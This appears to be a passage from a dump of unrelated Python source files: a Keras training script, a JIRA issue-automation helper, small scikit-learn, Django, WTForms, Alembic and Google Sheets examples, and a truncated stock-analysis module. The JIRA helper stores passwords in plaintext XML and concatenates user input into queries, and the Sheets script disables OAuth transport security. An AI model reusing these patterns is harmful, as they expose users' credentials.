tensorflow as tf\nfrom tensorflow import keras\nassert tf.__version__ >= \"2.0\"\n\n#%load_ext tensorboard\n\n# Common imports\nimport numpy as np\nimport os\n\n# to make this notebook's output stable across runs\nnp.random.seed(42)\n\n# To plot pretty figures\n#%matplotlib inline\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\n# Where to save the figures\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"deep\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\nos.makedirs(IMAGES_PATH, exist_ok=True)\n\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"Saving figure\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)\n\ndef logit(z):\n return 1 / (1 + np.exp(-z))\n\nz = np.linspace(-5, 5, 200)\n\n(X_train_full, y_train_full), (X_test, y_test) = keras.datasets.cifar10.load_data()\n\nX_train = X_train_full[5000:]\ny_train = y_train_full[5000:]\nX_valid = X_train_full[:5000]\ny_valid = y_train_full[:5000]\n\nkeras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = 
keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[32, 32, 3]))\nfor _ in range(20):\n model.add(keras.layers.Dense(100,\n kernel_initializer=\"lecun_normal\",\n activation=\"selu\"))\n\nmodel.add(keras.layers.AlphaDropout(rate=0.1))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))\n\noptimizer = keras.optimizers.Nadam(lr=5e-4)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])\n\nearly_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\nmodel_checkpoint_cb = keras.callbacks.ModelCheckpoint(\"my_cifar10_alpha_dropout_model.h5\", save_best_only=True)\nrun_index = 1 # increment every time you train the model\nrun_logdir = os.path.join(os.curdir, \"my_cifar10_alpha_logs\", \"run_alpha_dropout_{:03d}\".format(run_index))\ntensorboard_cb = keras.callbacks.TensorBoard(run_logdir)\ncallbacks = [early_stopping_cb, model_checkpoint_cb, tensorboard_cb]\n\nX_means = X_train.mean(axis=0)\nX_stds = X_train.std(axis=0)\nX_train_scaled = (X_train - X_means) / X_stds\nX_valid_scaled = (X_valid - X_means) / X_stds\nX_test_scaled = (X_test - X_means) / X_stds\n\nmodel.fit(X_train_scaled, y_train, epochs=100,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=callbacks)\n\nmodel = keras.models.load_model(\"my_cifar10_alpha_dropout_model.h5\")\nprint(model.evaluate(X_valid_scaled, y_valid))","sub_path":"06Chapter11TFBook/20Ex8ecifar10.py","file_name":"20Ex8ecifar10.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"237541035","text":"from jira.client import JIRA\r\nimport jira.config\r\nfrom Dev_Master import Dev_Meta\r\nimport xml.etree.ElementTree as ET\r\nfrom xml.etree.ElementTree import Element, SubElement, dump, ElementTree\r\n\r\nevent = 'dev' ## dev / release\r\ndev_local_path = 'd://project//python//JIRA_Estreamer//'\r\n\r\ndef GetPath():\r\n global event, dev_local_path\r\n if event == 'dev':\r\n return dev_local_path\r\n else:\r\n return ''\r\n\r\n#jira_usr = jira.config.get_jira('hlm')\r\n\r\n# HLM Dev. 
Tracker\r\nhlm_dev_url = \"http://hlm.lge.com/issue\"\r\n# HLM Q Tracker\r\nhlm_q_url = \"http://hlm.lge.com/qi\"\r\n\r\n# Project Id\r\n# project_id = 'SSP'\r\nproject_id = 'ESTREAMER'\r\n\r\n# jira issue query\r\njql_default = 'project='+project_id+' and '\r\njql_model_issue = jql_default+'filter in (L17_ESTREAMER_D_VA_실물검증)'\r\njql_test_issue = jql_default+'filter in (L17_ESTREAMER_D_VA_실물확인)'\r\njql_spec_issue = jql_default+'filter in (L17_ESTREAMER_D_VA_SPEC확인)'\r\n\r\n\r\n#jql_model_issue = jql_default+'filter in (L17_ESTREAMER_D_VA_실물검증_TEST)'\r\n#jql_test_issue = jql_default+'filter in (L17_ESTREAMER_D_VA_실물확인_TEST)'\r\n#jql_spec_issue = jql_default+'filter in (L17_ESTREAMER_D_VA_SPEC확인_TEST)'\r\n\r\n# E-Streamer S/W owner : JIRA reporter & default assignee\r\nestreamer_sw = 'gayoung.lee'\r\n#estreamer_sw = 'ybin.cho'\r\n\r\n# session file name used for Jira login\r\nsession_file_name = 'jira_session.xml'\r\n\r\n# when querying issues from Jira, the maxResults count must be set explicitly\r\n# @ jira_tracker.search_issues [default:50]\r\nmaxResult = 200\r\n\r\n# Filter : 실물검증TEST -> 실물검증\r\n# project_id = 'SSP' -> 'ESTREAMER'\r\n# filter name : L17_ESTREAMER_D_VA_XXXX_TEST -> L17_ESTREAMER_D_VA_XXXX\r\n\r\nclass JIRA_Handler:\r\n    main_issue_watchers = ['ybin.cho'] #, 'gayoung.lee']\r\n    def __init__(self, tracker):\r\n        # jira server url\r\n        global hlm_dev_url, hlm_q_url\r\n\r\n        global project_id\r\n        global jql_model_issue, jql_test_issue, jql_spec_issue\r\n        global estreamer_sw\r\n        global session_file_name\r\n        global GetPath\r\n        global maxResult\r\n\r\n        self.maxResultJira = maxResult\r\n\r\n        self.jira_id=''\r\n        self.pwd=''\r\n\r\n        #exception : default DEV tracker\r\n        if tracker.lower()==\"q\":\r\n            self.url = hlm_q_url\r\n        elif tracker.lower()==\"dev\":\r\n            self.url = hlm_dev_url\r\n        else: #default dev tracker\r\n            self.url = hlm_dev_url\r\n\r\n        self.issue_template = {'project':{\"key\":project_id}\r\n                            ,\"assignee\":{\"name\":estreamer_sw}\r\n                            ,'summary': '[Estreamer검증]'\r\n                            ,'description':'Test 중'\r\n                            ,'issuetype':{'name':'Request'}}\r\n        self.jira=None\r\n        self.jira_project_id = project_id\r\n        self.jql_model = jql_model_issue\r\n        self.jql_test = jql_test_issue\r\n        self.jql_spec = jql_spec_issue\r\n\r\n        self.session_file = GetPath()+session_file_name\r\n\r\n        print(\"JIRA handler init.\")\r\n\r\n    def saveSession(self):\r\n        ## check login success\r\n        if self.jira is None:\r\n            return\r\n        session = Element('Session')\r\n\r\n        server = Element('jira_url')\r\n        server.text = self.url\r\n        session.append(server)\r\n\r\n        account_id = Element('id')\r\n        account_id.text = self.jira_id\r\n        session.append(account_id)\r\n\r\n        account_pwd = Element('passwd')\r\n        account_pwd.text = self.pwd\r\n        session.append(account_pwd)\r\n\r\n        ## create or save session file\r\n        ElementTree(session).write(self.session_file)\r\n\r\n    def clearSession(self):\r\n        try:\r\n            tree = ET.parse(self.session_file)\r\n        except FileNotFoundError:\r\n            # need to do nothing\r\n            return\r\n        session = Element('Session')\r\n        ## overwrite the session file with an empty session tag\r\n        ElementTree(session).write(self.session_file)\r\n\r\n    # login using the local session file\r\n    # performs the same operation as slotLogin in Main\r\n    def sessionLogin(self, main_ui):\r\n        try:\r\n            tree = ET.parse(self.session_file)\r\n        except FileNotFoundError:\r\n            print(self.session_file)\r\n            main_ui.setNeedLoginState(True)\r\n            return\r\n\r\n        root = tree.getroot()\r\n
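        # expected session XML layout (mirrors what saveSession writes above):\r\n        #   <Session><jira_url>...</jira_url><id>...</id><passwd>...</passwd></Session>\r\n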
root.find('passwd').text\r\n self.jira = JIRA(server=url, basic_auth=(jira_id, pwd))\r\n except:\r\n print(\"login failed\")\r\n main_ui.setNeedLoginState(True)\r\n return\r\n else:\r\n ## login success\r\n self.url = url\r\n main_ui.jira_tracker = self.jira\r\n users = self.jira.search_users(jira_id)\r\n if len(users)==1: ## found user\r\n main_ui.login_user = users[0]\r\n main_ui.lblUserName.setText(users[0].displayName)\r\n self.jira_id = jira_id\r\n self.pwd = pwd\r\n main_ui.setNeedLoginState(False)\r\n else:\r\n # 가능한 상황은 아니라고 생각되지만 예외처리는 코딩해두도록 한다\r\n main_ui.lblUserName.setText('')\r\n main_ui.login_user = None\r\n main_ui.setNeedLoginState(True)\r\n return\r\n return\r\n\r\n # text widget의 id와 passwd를 이용한 login\r\n def login(self, jira_id, pwd, isSaveAccount):\r\n self.jira_id = jira_id\r\n self.pwd = pwd\r\n try:\r\n self.jira = JIRA(server=self.url, basic_auth=(jira_id, pwd))\r\n except:\r\n return \"failed\"\r\n else:\r\n ## save session of login info to local file\r\n if isSaveAccount:\r\n self.saveSession()\r\n users = self.jira.search_users(jira_id)\r\n if len(users)==1: ## found user\r\n return users[0]\r\n return None\r\n\r\n def concateModelNameForSummary(self, model_data):\r\n return (self.issue_template['summary']\r\n +\"[\"+model_data[Dev_Meta.idxRegion]+\"] \"\r\n + model_data[Dev_Meta.idxModelName])\r\n\r\n def getFieldsForModelIssue(self, dev_version, model_data):\r\n tracker = self.jira\r\n new_issue = self.issue_template.copy()\r\n new_issue['summary'] = self.concateModelNameForSummary(model_data)\r\n #new_issue['labels'].append(dev_version)\r\n new_issue['labels']=[\"실물검증\"]\r\n new_issue['description']= '''\r\n 개발 Master Ver. : {ver}\\n\r\n 엑셀 행 번호: {row}\\n\r\n Model Name : {model}\\n\r\n DV 시작 : {dv_start}\\n\r\n DV 종료 : {dv_end}\\n\r\n 담당자 ===========\\n\r\n SW : 이가영Y\\n\r\n HW PL : {hwpl}\\n\r\n 기획 : {plan}\r\n '''.format(ver=dev_version, row=model_data[len(model_data)-1], model=model_data[Dev_Meta.idxModelName], \\\r\n hwpl= model_data[Dev_Meta.idxHwPL], plan=model_data[Dev_Meta.idxHwPL+1], \\\r\n dv_start=model_data[Dev_Meta.idxDvStart], dv_end=model_data[Dev_Meta.idxDvEnd])\r\n return new_issue\r\n\r\n def getFieldsForSpecCheckIssue(self, model_data, parent_issue):\r\n if parent_issue is None:\r\n # model issue (parent issue)가 생성 실패되었음\r\n return None\r\n\r\n tracker = self.jira\r\n new_issue = self.issue_template.copy()\r\n new_issue['summary'] = self.concateModelNameForSummary(model_data)+ ' Spec. 확인 요청'\r\n model_name = model_data[Dev_Meta.idxModelName]\r\n new_issue['labels']=[\"실물검증\"]\r\n new_issue['description']= '''\r\n 모델 : {color:red}'''+model_name+'{color}\\n'\r\n\r\n new_issue['description']+= '''\r\n 상기 모델에 대해 E-Streamer 적용되어야 할 Spec. 모델명 확인 요청 드립니다.\\n\r\n Spec. 모델명이란 E-Streamer Spec. Sheet 상에 지역 탭에 정의된 'Model Name' 항목을 의미합니다.\\n\r\n 모델에 대한 정보는 본 이슈의 상위 이슈를 참조하세요.\\n\r\n E-Streamer Spec. 
Sheet 기준 적용 모델명을 comment에 기입 후 Resolve 부탁 드립니다.'''\r\n\r\n        new_issue['issuetype'] = {'name' : 'Sub-task'}\r\n        new_issue['parent'] = {'id' : parent_issue.key}\r\n        return new_issue\r\n\r\n    def getFieldsForTestIssue(self, model_data, parent_issue):\r\n        if parent_issue is None:\r\n            # model issue (parent issue)가 생성 실패되었음\r\n            return None\r\n\r\n        tracker = self.jira\r\n        new_issue = self.issue_template.copy()\r\n        new_issue['summary'] = self.concateModelNameForSummary(model_data)+ ' 실물 확인'\r\n        model_name = model_data[Dev_Meta.idxModelName]\r\n        new_issue['description']= '''\r\n        모델 : {color:red}'''+model_name+'{color}\\n'\r\n\r\n        new_issue['description']+= '''\r\n        유첨 E-Streamer 적용 결과 이미지 참조하시어 실물 점검 부탁 드립니다.\\n\r\n        모델 정보는 상위 이슈 참조하세요.\\n\r\n        Comment 확인하시어 지역(Area) 내 전 국가 실물 확인 후 Resolve 부탁 드립니다.\\n\r\n\r\n        PPM 포맷 이미지 뷰어는 알씨 등이 지원하고 있으며 아래 사이트에서도 쉽게 다운로드 가능합니다.\\n\r\n        : http://free-ppm-viewer.en.informer.com/\\n\r\n        : 캡쳐 파일 바로 열기에 문제가 있을 경우 이미지 파일을 로컬에 저장 후 열어주세요.\\n'''\r\n\r\n        new_issue['issuetype'] = {'name' : 'Sub-task'}\r\n        new_issue['parent'] = {'id' : parent_issue.key}\r\n        return new_issue\r\n\r\n\r\n    def inquiryModelIssue(self, model_name):\r\n        tracker = self.jira\r\n        result_list = tracker.search_issues(self.jql_model+' AND summary~\"'+model_name+'\"')\r\n        if len(result_list)!=1:\r\n            print(\"search failed !. number of result length : \"+str(len(result_list)))\r\n            return None\r\n        return result_list[0]\r\n\r\n    def inquiryTestIssue(self, model_name):\r\n        tracker = self.jira\r\n        result_list = tracker.search_issues(self.jql_test+' AND summary~\"'+model_name+'\"')\r\n        if len(result_list)!=1:\r\n            print(\"search failed !. number of result length : \"+str(len(result_list)))\r\n            return None\r\n        return result_list[0]\r\n\r\n    def inquirySpecConfirmIssue(self, model_name):\r\n        tracker = self.jira\r\n        result_list = tracker.search_issues(self.jql_spec+' AND summary~\"'+model_name+'\"')\r\n        if len(result_list)!=1:\r\n            print(\"search failed !. 
number of result length : \"+str(len(result_list)))\r\n            return None\r\n        return result_list[0]\r\n\r\n    def resolveIssueForDroppedModel(self, ver, issue_key):\r\n        tracker = self.jira\r\n        try:\r\n            issue = tracker.issue(issue_key)\r\n            status_name = issue.fields.status.name\r\n        except:\r\n            return\r\n        comment_body = '개발 Master '+ver+' 에서 본 모델 Drop되어 Resolve 합니다.'\r\n\r\n        if status_name != 'Resolved' and status_name != 'Closed':\r\n            tracker.transition_issue(issue, 'Resolve Issue', comment=comment_body)\r\n\r\n    def createModelIssueAndSubTasks(self, dev_version, model):\r\n        model_issue = None  # referenced in the except block, so it must exist even if creation fails early\r\n        try:\r\n            ## 1) create model issue\r\n            print('start get fields of model issue')\r\n            model_fields = self.getFieldsForModelIssue(dev_version, model)\r\n            print('complete get fields of model issue')\r\n            model_issue = self.jira.create_issue(fields=model_fields)\r\n            print('complete create model issue')\r\n\r\n            ## 2) create spec.확인 issue\r\n            spec_fields = self.getFieldsForSpecCheckIssue(model, model_issue)\r\n            self.jira.create_issue(fields=spec_fields)\r\n\r\n            ## 3) create 실물확인 issue\r\n            test_fields = self.getFieldsForTestIssue(model, model_issue)\r\n            self.jira.create_issue(fields=test_fields)\r\n        except:\r\n            print(\"failed to create model issues : \"+model[Dev_Meta.idxModelName])\r\n            if model_issue is not None:\r\n                model_issue.delete()\r\n            return False\r\n        else:\r\n            return True\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# issue = jira_usr.issue(\"ESTREAMER-127\")\r\n# project = jira_usr.project(\"ESTREAMER\")\r\n#\r\n#\r\n# rawdata = issue.raw\r\n#\r\n#\r\n#\r\n# print(rawdata)\r\n\r\n\r\n# import re\r\n# from jira import JIRA\r\n#\r\n# options = {'server': 'http://hlm.lge.com/qi/'}\r\n# jira = JIRA(options)\r\n#\r\n# projects = jira.projects();\r\n#\r\n# print(\"projects type : \"+type(projects))\r\n#\r\n# issue = jira.issue('ESTREAMER-127')\r\n# print(\"issue type : \"+type(issue))\r\n","sub_path":"UI_part/JIRA_E-Streamer/JIRA_Handle.py","file_name":"JIRA_Handle.py","file_ext":"py","file_size_in_byte":12768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"472838703","text":"from sklearn import datasets\nfrom sklearn.neighbors import KNeighborsClassifier\nimport numpy as np\nnp.random.seed(0)\ndatapath = 'E:\\ML\\Knn\\iris.csv'\ndataarray = np.loadtxt(datapath, delimiter = ',', usecols = [0, 1, 2, 3])\nlabelarray = np.loadtxt(datapath, delimiter = ',', usecols = [4], dtype = str)\nindex = np.random.permutation(len(dataarray))\niris_x_trian = dataarray[index[:-10]]\niris_y_trian = labelarray[index[: -10]]\niris_x_test = dataarray[index[-10:]]\niris_y_test = labelarray[index[-10:]]\nknn = KNeighborsClassifier()\nknn.fit(iris_x_trian, iris_y_trian)\niris_y_predict = knn.predict(iris_x_test)\nprobility = knn.predict_proba(iris_x_test)\nneighborpoint = knn.kneighbors(iris_x_test[-1:], 5, False)\nscore = knn.score(iris_x_test, iris_y_test,sample_weight = None)\nprint('iris_y_predict = ')\nprint(iris_y_predict)\nprint('iris_y_test =')\nprint(iris_y_test)\n\n\n\n","sub_path":"ML/Sklearn/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"254295353","text":"class Interpreter:\n    def __init__(self):\n        self.stack = []\n        self.environment = {}\n\n    def LOAD_VALUE(self, number):\n        self.stack.append(number)\n\n    def PRINT_ANSWER(self):\n        print(self.stack.pop())\n\n    def ADD_TWO_VALUES(self):\n        self.stack.append(self.stack.pop() + self.stack.pop())\n\n    def STORE_NAME(self, name):\n        
self.environment[name] = self.stack.pop()\n\n def LOAD_NAME(self, name):\n self.stack.append(self.environment[name])\n\n def parse_argument(self, instruction, arg, to_execute):\n \"\"\"parse argument to call the correct function\"\"\"\n numbers = [\"LOAD_VALUE\"]\n names = [\"STORE_NAME\", \"LOAD_NAME\"]\n\n if instruction in numbers:\n return (instruction, to_execute['numbers'][arg])\n elif instruction in names:\n return (instruction, to_execute['names'][arg])\n else:\n return (instruction, None)\n\n def run_code(self, to_execute):\n numbers = to_execute[\"numbers\"]\n\n if len(numbers) == 2:\n for step in to_execute[\"instructions\"]:\n (instruction, argument) = self.parse_argument(step[0], step[1], to_execute)\n method = getattr(self, instruction)\n if argument is None:\n method()\n else:\n method(argument)\n\n\nif __name__ == '__main__':\n what_to_execute = {\n \"instructions\": [\n (\"LOAD_VALUE\", 0),\n (\"STORE_NAME\", 0),\n (\"LOAD_VALUE\", 1),\n (\"STORE_NAME\", 1),\n (\"LOAD_NAME\", 0),\n (\"LOAD_NAME\", 1),\n (\"ADD_TWO_VALUES\", None),\n (\"PRINT_ANSWER\", None)\n ],\n \"numbers\": [7, 5],\n \"names\": ['a', 'b']\n }\n\n Interpreter().run_code(what_to_execute)","sub_path":"Interpreter.py","file_name":"Interpreter.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"522725184","text":"import datetime\n\n\ndef pk_terms_for_task(task, parent):\n action = task['Action']\n preposition = \" with \" if task['Indirect'] else \"\"\n prepreposition = \" \" if task['Direct'] else \"\"\n if action == \"Attend\" and not task['Direct']:\n preposition = \" to \"\n if action in (\"Migrate\", \"Transfer\", \"Travel\"):\n preposition = \" to \"\n elif action in (\"Present\", ):\n preposition = \" on \"\n elif action in (\"Buy\", ):\n preposition = \" for \"\n elif action in (\n \"Ideate\",\n \"Deliberate\",\n \"Muse\",\n ):\n preposition = \" on \"\n elif action in (\"Upload\", ):\n preposition = \" from \"\n elif action in (\"Vacation\", ):\n prepreposition = \" in \"\n elif action in (\"Lunch\", \"Dine\", \"Shop\", \"Tennis\", \"Coffee\"):\n if task['Direct']:\n prepreposition = \" at \"\n elif action in (\"Tend\", ):\n prepreposition = \" to \"\n elif action in (\"Jam\", ):\n if task['Direct']:\n prepreposition = \" at \"\n elif action == \"Liase\":\n prepreposition = \" with \"\n preposition = \" on \"\n direct_clause, indirect_clause = \"\", \"\"\n mandate = [\n action, prepreposition, task['Direct'], preposition, task['Indirect']\n ]\n if task[\"Parameters\"]:\n marker = \" at\" if action in (\"Extend\", \"Improve\", \"Sustain\") else \",\"\n mandate.append(\"{} {}\".format(marker, task['Parameters']))\n planned_start, planned_span = task[\"Param~Start\"], task[\"Param~Span\"]\n distinguisher = (\n datetime.datetime(1970, 1, 1) +\n datetime.timedelta(days=int(planned_start))).strftime(\"%d %b %Y\")\n if task[\"Param~Span\"] and task[\"Param~Span\"] != \"Day\":\n distinguisher = \"{} of {}\".format(task[\"Param~Span\"], distinguisher)\n mandate.append(\" ({})\".format(distinguisher))\n return mandate\n\n\ndef pk_for_task(task, parent):\n # TODO(rabrams) this function no longer needs a provided parent\n # so let's get rid of it as an input\n return \"\".join(pk_terms_for_task(task, parent))\n\n\nclass TimeDB(object):\n\n def __init__(self, db):\n self.db = db\n\n def update_files_pk(self, old, new):\n files = self.db[\"files\"]\n f = files[old]\n del files[old]\n files[new] = f\n\n def 
update_task_pk(self, old, new):\n        if old == new:\n            return\n        if new in self.db[\"tasks\"]:\n            raise ValueError(\"key already exists\", new)\n        task = self.db[\"tasks\"][old]\n        del self.db[\"tasks\"][old]\n        self.db[\"tasks\"][new] = task\n        self.update_task_in_log(old, new)\n        self.update_arg_in_assertions(\"tasks\", old, new)\n        for task in self.db[\"tasks\"].values():\n            if task[\"Primary Goal\"] == old:\n                task[\"Primary Goal\"] = new\n\n    def update_task_in_log(self, old, new):\n        # TODO should hash this\n        for pk, log in self.db[\"log\"].items():\n            if log[\"A Task\"] == old:\n                log[\"A Task\"] = new\n                # NOTE not changing PKs here as they require context on\n                # other entries and it's not really needed\n\n    def update_arg_in_assertions(self, table, old, new):\n        full_id = \"tasks {}\".format(old)\n        new_full_id = \"tasks {}\".format(new)\n        # Take a snapshot of assertions to not modify while iterating\n        for pk, assn in list(self.db[\"assertions\"].items()):\n            if assn[\"Arg1\"] == full_id:\n                assn[\"Arg1\"] = new_full_id\n            if assn[\"Arg0\"] == full_id:\n                assn[\"Arg0\"] = new_full_id\n                new_pk = pk_for_assertion(assn)\n                del self.db[\"assertions\"][pk]\n                self.db[\"assertions\"][new_pk] = assn\n            if assn[\"A Relation\"] == \".Do Today\" and assn[\"Arg1\"] == f\"[ ] {old}\":\n                assn[\"Arg1\"] = f\"[ ] {new}\"\n            if assn[\"A Relation\"] == \".Do Today\" and assn[\"Arg1\"] == f\"[x] {old}\":\n                assn[\"Arg1\"] = f\"[x] {new}\"\n\n\n\ndef pk_for_assertion(assn):\n    key = (assn[\"A Relation\"], assn[\"Arg0\"], assn[\"Order\"])\n    return str(key)\n","sub_path":"lib/py/timedb/pks.py","file_name":"pks.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"310446913","text":"import tabula\nimport pandas as pd\n\nVALIDATOR = 'CONTATOR'\n\nHEAD_COFINS = ['Modelo', 'Série', 'Número_Nota', 'Emissão','Descrição',\n               'Cod_Mercadoria', 'CFOP', 'UF', 'Unidade', 'Quantidade', 'Valor', 'Diferença', 'COFINS']\nNEW_HEAD_COFINS = ['Modelo', 'Série', 'Número_Nota', 'Emissão','NCM', 'Descrição',\n                   'Cod_Mercadoria', 'CFOP', 'UF', 'Unidade', 'Quantidade', 'Valor', 'Diferença', 'COFINS']\ndef format_df(row):\n    if row['Descrição'].count(VALIDATOR)==1:\n        index = int(row['index'])+1\n        x = df.loc[df['index'] == index, 'Descrição'].values[0]\n        df['NCM'] = row['Descrição'][:9]\n        row['Descrição'] = row['Descrição'][8:]+x\n\n        return row\n    else:\n        return 'remove'\n\ndf_result = pd.DataFrame()\nPATH = \"C:\\\\Users\\\\felipe.santana\\\\desktop\\\\Jobs\\\\Thulio\\\\felipe\\\\Laudo\\\\COFINS\\\\2010 COFINS - 10283723413201666_05673_07166_DOCUMENTOSDIVERSOS-OUTROS.PDF\"\nfile = tabula.read_pdf(PATH, output_format='dataframe', encoding='ANSI', java_options=None, pages='all').fillna('')\nfor i in file:\n    df = i\n    df.columns = HEAD_COFINS\n    df = df.drop(index=[0,1])\n    df['Descrição'] = df['Descrição'].astype(str)\n\n    df = df.reset_index()\n\n    df = df.apply(lambda row: format_df(row), axis=1)\n    df = df[~df.Descrição.str.contains(\"remove\") == True]\n    df = df[NEW_HEAD_COFINS]\n    df_result = pd.concat([df_result, df])\n\n\nwrite = pd.ExcelWriter('C:\\\\Users\\\\felipe.santana\\\\desktop\\\\Jobs\\\\Thulio\\\\felipe\\\\NEW\\\\NEW\\\\2010 COFINS - 10283723413201666_05673_07166_DOCUMENTOSDIVERSOS-OUTROS.xlsx')\ndf_result.to_excel(write,'Teste', index=False)\nwrite.save()\n","sub_path":"ExtractPDFCofins.py","file_name":"ExtractPDFCofins.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"}
+{"seq_id":"230007846","text":"import constants\nfrom wtforms import validators, Form, FloatField, SelectField, TextAreaField\n\n\nclass PaymentForm(Form):\n    \"\"\" Payment form class with fields validation \"\"\"\n\n    amount = FloatField('Amount',\n                        validators=[\n                            validators.required(message='Amount field is required.'),\n                            validators.number_range(\n                                min=constants.amount_min,\n                                message='Minimum possible amount: {0:.2f}.'.format(constants.amount_min)\n                            )\n                        ])\n\n    currency = SelectField('Currency', choices=constants.currency_choices)\n\n    description = TextAreaField('Product description',\n                                validators=[\n                                    validators.required(message='Description field is required.'),\n                                    validators.length(\n                                        min=constants.description_min_length,\n                                        max=constants.description_max_length,\n                                        message='Description length should be between {0} and {1} symbols.'.format(\n                                            constants.description_min_length,\n                                            constants.description_max_length\n                                        )\n                                    )\n                                ])\n","sub_path":"payment/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"246441269","text":"from django.db import models\nfrom django.utils import timezone\n\n# Create your models here.\n\nclass Post(models.Model):\n    text = models.TextField(blank=True, null=True)\n    created_date = models.DateField(default=timezone.now, blank=True, null=True)\n    published_date = models.DateTimeField(default=timezone.now, blank=True, null=True)\n    image = models.ImageField(upload_to='static/home', blank=True, null=True)\n    \n    def publish(self):\n        self.published_date = timezone.now()\n        self.save()\n    \n''' def __str__(self):\n        if self.text:\n            return self.text\n'''\n'''\n    if self.image:\n        return self.image\nException Type:\tTypeError\nException Value:\t\n__str__ returned non-string (type ImageFieldFile)\n'''","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"413731323","text":"\"\"\"add lab users\n\nRevision ID: 63819a8dbc41\nRevises: 0dae246c7b99\nCreate Date: 2017-02-23 20:00:15.014555\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '63819a8dbc41'\ndown_revision = '0dae246c7b99'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('labs_users',\n    sa.Column('user_id', sa.Integer(), nullable=True),\n    sa.Column('lab_id', sa.Integer(), nullable=True),\n    sa.ForeignKeyConstraint(['lab_id'], ['lab.laboratory_id'], ),\n    sa.ForeignKeyConstraint(['user_id'], ['user.id'], )\n    )\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('labs_users')\n # ### end Alembic commands ###\n","sub_path":"alembic/versions/63819a8dbc41_add_lab_users.py","file_name":"63819a8dbc41_add_lab_users.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"438384844","text":"import os\nimport google.oauth2.credentials\nimport pickle\n\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\n\n\nCREDENTIALS_FILE = \"credentials.json\"\nSCOPES = ['https://www.googleapis.com/auth/spreadsheets']\nAPI_SERVICE_NAME = 'sheets'\nAPI_VERSION = 'v4'\n\ndef get_authenticated_service():\n credentials = None\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n credentials = pickle.load(token)\n if not credentials or not credentials.valid:\n if credentials and credentials.expired and credentials.refresh_token:\n credentials.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n CREDENTIALS_FILE, SCOPES)\n credentials = flow.run_console()\n \n with open('token.pickle', 'wb') as token:\n pickle.dump(credentials, token)\n \n return build(API_SERVICE_NAME, API_VERSION, credentials = credentials)\n \ndef translate(service, phrase):\n sheet = service.spreadsheets()\n spreadsheet = {\n 'properties': {\n 'title': 'translator'\n }\n }\n print('Creating sheet...')\n spreadsheet = sheet.create(body=spreadsheet,fields='spreadsheetId').execute()\n spreadsheet_id = spreadsheet.get('spreadsheetId')\n \n values = [\n [\n phrase, '=GOOGLETRANSLATE(A2, \"en\", \"de\")'\n ],\n ]\n body = {\n 'values': values\n }\n print('Translating phrase...')\n result = service.spreadsheets().values().update(\n spreadsheetId=spreadsheet_id, range='A2:B2',\n valueInputOption='USER_ENTERED', body=body).execute()\n \n print('Retrieving translation...')\n result = service.spreadsheets().values().get(\n spreadsheetId=spreadsheet_id, range='B2').execute()\n rows = result.get('values', [])\n \n print('Original: {}'.format(phrase))\n print('Translation: {}'.format(rows[0][0]))\n \n print('Done')\n \n\nif __name__ == '__main__':\n os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\n service = get_authenticated_service()\n translate(service, 'Hello World')","sub_path":"assignments/Sprint7/sprint7.py","file_name":"sprint7.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"510570315","text":"# coding: utf-8\n\nimport traceback\nfrom .analyze import KlineAnalyze, is_bei_chi, get_ka_feature\n\n\ndef is_in_tolerance(base_price, latest_price, tolerance):\n \"\"\"判断 latest_price 是否在 base_price 的买入容差范围(上下 tolerance)\"\"\"\n if (1 - tolerance) * base_price <= latest_price <= (1 + tolerance) * base_price:\n return True\n else:\n return False\n\n\ndef is_first_buy(ka, ka1, ka2=None, pf=False):\n 